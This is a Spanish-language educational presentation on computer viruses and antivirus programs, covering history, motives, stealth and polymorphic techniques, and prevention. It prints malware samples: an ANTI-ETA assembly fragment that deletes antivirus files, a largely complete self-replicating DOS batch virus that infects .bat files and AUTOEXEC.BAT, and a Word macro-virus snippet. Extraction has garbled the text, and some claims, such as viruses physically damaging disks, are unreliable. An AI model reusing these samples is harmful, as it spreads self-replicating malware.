VirusVirus yy AAnntitivvirusirus

¿Qué es un Virus?¿Qué es un Virus?

Es un programa que por sus características semejantes a un virus biológico recibe este nombre. Son difíciles de detectar si no se tienen las herramientas adecuadas y una de sus funciones principales es la reproducirse, por lo que pueden dañar la información de tus discos al reproducirse sobre tus archivos.

Estos programas tienen Estos programas tienen por característicaspor características

Auto-reproducción.-Auto-reproducción.- esta es la capacidad del programa de sacar una copia de sí mismo sin consentimiento del usuario.

Infección.-Infección.- esta es la capacidad del programa de alojarse por si mismo en otros programas, diferentes a los que lo portaba.

Dependiendo del tipo Dependiendo del tipo de virus también de virus también

pueden: pueden:

DañarDañar ArchivosArchivosEstos archivos siguen existiendo, pero la información que contienen no tiene sentido alguno, o bien no existe.

Dañar DiscosDañar DiscosEsto va tanto a los disquetes como a los discos duros, existen virus que sobrecalientan los discos, que los aceleran para disminuir su tiempo de vida, que los rayan (a fuerza de tanto leer sobre ellos), etc.

Dañar Estructura de DiscoDañar Estructura de DiscoEsto es, que ni los archivos, ni los disquetes son dañados de uno por uno, sino que simplemente “formatean” el contenido del disco.

Connotación CientíficaConnotación Científica

Virii.-Virii.- con este termino se hace referencia al estudio y desarrollo de virus informáticos. Tras esta palabra se esconde toda una filosofía informática.

¿Cómo es un virus?¿Cómo es un virus?

Un virus no es mas que un conjunto de instrucciones de programación. Habitualmente los virus se programan en lenguaje de muy bajo nivel (Ensamblador), pero podemos encontrar virus programados en C, Visual Basic, o lenguaje de Macros de Word o Excel, por ejemplo.

El código de un virus seria este:

Install_check: cmp esi, “ANTI” je reponde_cabron jmp crypt_leave21hreponde_cabron: pushf Interrupt 21h call dword ptr cs:[old21h] mov esi,”ETA” call delete_file; ANTI-VIR.DAT files mov dx,offset del_this_shit02; AndCHKLIST.MS shit call delete_file call free_24h_03h jmp exit21h

Estas instrucciones son incomprensibles para una persona que no conozca el lenguaje ensamblador. Pertenecen al virus ANTI-ETA. Naturalmente y por razones obvias este no es todo el código del virus, es solo una pequeña parte del mismo. Este código se graba en un archivo y se pasa por un programa ensamblador y linkador, que lo convierte en ejecutable, es decir, con extensión, .EXE o .COM. Después el virus se ejecuta e inicia el proceso de infección.

Bat Virus (DOS)Mi BAT-Virus se llama HARL y se divide en 4 partes:la unola dosla tresy la cuatro. Es broma :). Se divide en 4 partes:

Harl. La de la primera ejecución en un ordenador "limpio".Harlbus. La que busca otros archivos bat para infectarlos.HarlInf. La que los infecta.y Harlvir. La que actúa el día indicado para... PARA NADA, MALPENSADOS!

Veamos el codigo:----------------------------------{ harl.bat }-------------------------------%[harl_A]%@echo off%[harl]%if '%1=='V goto harlvirif '%1=='I goto harlInfif exist C:\harl.bat goto harlbusif not exist %0.bat goto harlfinfind /i "harl"<%0.bat>>C:\harl.batattrib C:\harl.bat +hfind /i "harl"nul

Continua el codigo... if not errorlevel 1 goto harlfinset harl_P="harl_A"find /i %harl_P%>C:\AUTOEXEC.BATset harl_P=goto harlfinecho.%harl_A%|date|find "22">nulif not errorlevel 1 call c:\harl.bat V%harl_A%:harlInffind /i "harl"<%2>nulif not errorlevel 1 goto harlfintype C:\harl.bat>>%2goto harlfin:harlvirREM [Poner aqui algo interesante]goto harlfin:harlbusfor %%f in (.\*.bat ..\*.bat C:\*.bat) do call c:\harl.bat I %%fgoto harlfin:harlfin

Virus de Macro.

Sub MAIN DIM dlg As FileSaveAs GetCurValues dlg ToolsOptionsSave.GlobalDotPrompt=0 Ifcheckit(0)=0 Then MacroCopy FileName$() + ":autoopen", "global;autoopen"

End If

¿Quién creo los virus?¿Quién creo los virus?

Según se dice, los virus fueron creados como una forma de protección contra la piratería; es decir, los autores de los programas comerciales, vendían sus productos que contenían un virus inactivo, pero que se activa al momento de copiar ilegalmente los programas.

La interesante historia del virus del computador ha existido en la ciencia- ficción desde los años 60. En aquella época, por supuesto, era justa una fantasía de los autores. No era hasta la revolución del computador de los años ochenta que hicieron una realidad. En 1983 el Dr. Frederick Cohen experimentó en la universidad de Pennsylvania con código “virus”.

Se originaron en 1986 con la creación del cerebro, el primer virus para las computadoras personales. Dos hermanos lo escribieron Basid y Farooq Alvi, que ejecutó una casa de software lógica pequeña en Lahore, Paquistán y comenzaron la raza entre los virus y los programas del antivirus que todavía continúa hoy.

¿Por qué se ¿Por qué se creacrea un un virus?virus?

La gran mayoría de los creadores de virus lo ven como un hobby, aunque también otros usan los virus como un medio de propaganda o difusión de sus quejas o ideas radicales, como por ejemplo el virus Telefónica, que emitía un mensaje de protesta contra las tarifas de esta compañía a la vez que reclamaba un mejor servicio, o el

famosísimo Silvia que sacaba por pantalla la dirección de una chica que al parecer no tuvo una buena relación con el programador del virus. En otras ocasiones es el orgullo, o la competitividad entre los programadores de virus lo que les lleva a desarrollar virus cada vez más destructivos y difíciles de controlar.

Técnicas de los virusTécnicas de los virus

Son técnicas “furtivas” que utilizan para pasar desapercibidos al usuario y a los antivirus. Habitualmente los virus ocultan el tamaño real de los archivos que han contaminado, de forma que si digitamos el comando (DIR) la información de los tamaño de los archivos puede ser falsa.

Técnicas Técnicas StealthStealth

Técnicas AntidebuggersTécnicas Antidebuggers

Un debugger es un programa que permite descompilar programas ejecutables y mostrar parte de su código en lenguaje original. Los virus usan técnicas para evitar ser desensamblados y así impedir su análisis para la fabricación del antivirus correspondiente.

Técnicas Polimorfismo o Auto Técnicas Polimorfismo o Auto mutación mutación

Es una técnica que consiste en variar el código vírico en cada infección (mas o menos lo que se hace el virus del sida en los humanos con su capa proteica). Esto obliga a los antivirus a usar técnicas heurísticas ya que como el virus cambia en cada infección es imposible localizarlo buscándolo por cadenas de códigos.

Esto se consigue utilizando un algoritmo de encriptación que pone las cosas muy difíciles a los antivirus. No obstante no se puede codificar todo el código del virus, siempre debe quedar una parte sin mutar que toma el control y esa es la parte más vulnerable al antivirus.

TécnicasTécnicas TSRTSR Los programas residentes en memoria (TSR) permanecen alojados en esta durante toda su ejecución.Los virus utilizan esta técnica para mantener el control sobre todas las actividades del sistema y contaminar todo lo que encuentren a su paso. El virus permanece en memoria mientras la computadora permanezca encendido. Por eso una de las primeras cosas que hace al llegar a la memoria es contaminar los archivos de arranque del sistema para asegurarse de que cuando se vuelva a arrancar la computadora volverá a ser cargado en memoria.

¿Cómo se transmiten ¿Cómo se transmiten los virus en el los virus en el computador?computador?

Anteriormente, solo podían infectarse archivos de sistemas es decir, comandos externos (*.com) y programas ejecutables (*.exe), por lo que solamente se podían infectar los discos si se utilizaba una computadora que tuviera virus en memoria de sistema o se ejecuta un programa infectado.

Basta con leer con tu procesador uno de estos archivos para que tu programa cargue el virus a memoria y lo haga parte de sí, infectando todos los archivos que leas en adelante.

Actualmente los virus pueden transmitirse a través de archivos de casi cualquier tipo, incluyendo documentos de word, hojas de cálculos o archivos (*.zip).

¿Qué es un Antivirus?¿Qué es un Antivirus?

Es un programa que detecta y elimina los virus de las computadoras y es necesario que se instale un antivirus en cuanto uno compre un computador, en algunos casos las empresas instalan un antivirus, si el virus no se elimina lo recomendable es eliminar el archivo.

¿Cómo puedo evitar ¿Cómo puedo evitar una infección por un una infección por un

virus?virus?Colocando la muesca de protección contra escritura en tus discos flexibles cuando los utilices en una computadora que no sea la tuya

Evitando copiar software ilegalmente.

Revisando con un antivirus todos los discos que uses en tu computadora antes de trabajar con ellos.

Si utilizas una computadora, que esta prendida lo recomendable es que lo apagues, esperar un momento y encenderla antes de trabajar con ellos, para eliminar la posibilidad de que alguien haya dejado un virus en memoria.

Regresar a la lista de temas

Regresar a la página principal